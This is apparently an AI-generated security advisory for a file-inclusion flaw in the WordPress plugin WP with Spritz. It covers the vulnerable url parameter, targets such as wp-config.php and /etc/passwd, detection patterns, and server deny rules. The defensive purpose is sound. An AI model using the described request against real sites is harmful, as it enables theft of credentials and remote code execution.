CVE-2018-25329 Overview
CVE-2018-25329 is a remote file inclusion (RFI) vulnerability in the WordPress plugin WP with Spritz version 1.0. The flaw exists in wp.spritz.content.filter.php, which accepts a url parameter without validation. Unauthenticated attackers can send crafted GET requests to read arbitrary local files or include remote resources. Successful exploitation discloses sensitive data such as system configuration files and stored credentials. The vulnerability is classified under CWE-98 (Improper Control of Filename for Include/Require Statement in PHP Program).
Critical Impact
Unauthenticated remote attackers can read arbitrary files on the host, including configuration files containing database credentials and WordPress secret keys.
Affected Products
- WordPress Plugin WP with Spritz version 1.0
- WordPress installations using the WP with Spritz plugin
- The vulnerable script wp.spritz.content.filter.php
Discovery Timeline
- 2026-05-17 - CVE-2018-25329 published to NVD
- 2026-05-18 - Last updated in NVD database
Technical Details for CVE-2018-25329
Vulnerability Analysis
The WP with Spritz plugin exposes the script wp.spritz.content.filter.php, which directly uses a user-supplied url parameter inside a PHP file inclusion function. Because PHP file inclusion functions resolve both local paths and remote URLs when allow_url_include is enabled, the parameter doubles as a vector for local file inclusion (LFI) and remote file inclusion (RFI). Attackers exploit the flaw with a single GET request, requiring no authentication, no user interaction, and no privileges. The EPSS score is 0.03%, reflecting limited active exploitation given the plugin's small footprint.
Root Cause
The root cause is improper control of a filename used in a PHP include or require statement, mapped to [CWE-98]. The plugin neither sanitizes nor restricts the url parameter to an allowlist of expected values. There is no path normalization, scheme filtering, or check against directory traversal sequences such as ../.
Attack Vector
The attack vector is network-based. An attacker issues a GET request to wp.spritz.content.filter.php and supplies a malicious value in the url parameter. Typical payloads target local files such as /etc/passwd or WordPress files like wp-config.php to retrieve database credentials and authentication keys. When allow_url_include is enabled in php.ini, attackers can also point url to an external server hosting PHP code, escalating the issue to remote code execution.
The vulnerability mechanism is described in the Exploit-DB entry #44544 and the VulnCheck advisory.
Detection Methods for CVE-2018-25329
Indicators of Compromise
- HTTP GET requests to wp.spritz.content.filter.php containing a url parameter, especially with values referencing wp-config.php, /etc/passwd, or external http:// or https:// URLs.
- Web server access logs showing repeated requests to the plugin script from a single source IP.
- Outbound network connections from the web server to attacker-controlled hosts referenced in the url parameter.
Detection Strategies
- Inspect WordPress plugin directories for the presence of wp-with-spritz and the wp.spritz.content.filter.php script.
- Configure web application firewall (WAF) rules to flag requests containing path traversal sequences or remote URL schemes inside the url parameter.
- Hunt across web access logs for the pattern wp.spritz.content.filter.php?url= paired with suspicious values.
Monitoring Recommendations
- Monitor PHP error logs for include or require warnings referencing unexpected file paths.
- Track outbound HTTP requests originating from PHP worker processes to identify RFI callback activity.
- Alert on reads of sensitive files such as wp-config.php by the web server user outside of normal application flows.
How to Mitigate CVE-2018-25329
Immediate Actions Required
- Deactivate and remove the WP with Spritz plugin from all WordPress installations until a patched version is available.
- Rotate WordPress database credentials, salts, and API keys if log review shows requests to wp.spritz.content.filter.php with a url parameter.
- Restrict access to the plugin's PHP scripts at the web server level using deny rules.
Patch Information
No vendor patch is referenced in the published CVE data. The plugin remains available for download from the WordPress plugin repository, but no fixed release has been published. Administrators should treat the plugin as end-of-life and replace it with a maintained alternative.
Workarounds
- Set allow_url_include = Off and allow_url_fopen = Off in php.ini to block remote inclusion payloads.
- Deploy WAF signatures that block requests to wp.spritz.content.filter.php containing path traversal or URL scheme indicators in the url parameter.
- Apply least-privilege file permissions so the web server user cannot read sensitive system files such as /etc/shadow.
- Remove the plugin directory entirely if uninstallation through the WordPress admin console is not feasible.
# Configuration example: disable remote inclusion in php.ini
allow_url_include = Off
allow_url_fopen = Off
# Apache: block direct access to the vulnerable script
<Files "wp.spritz.content.filter.php">
Require all denied
</Files>
# Nginx: deny access to the vulnerable script
location ~* /wp-content/plugins/wp-with-spritz/wp\.spritz\.content\.filter\.php$ {
deny all;
return 403;
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
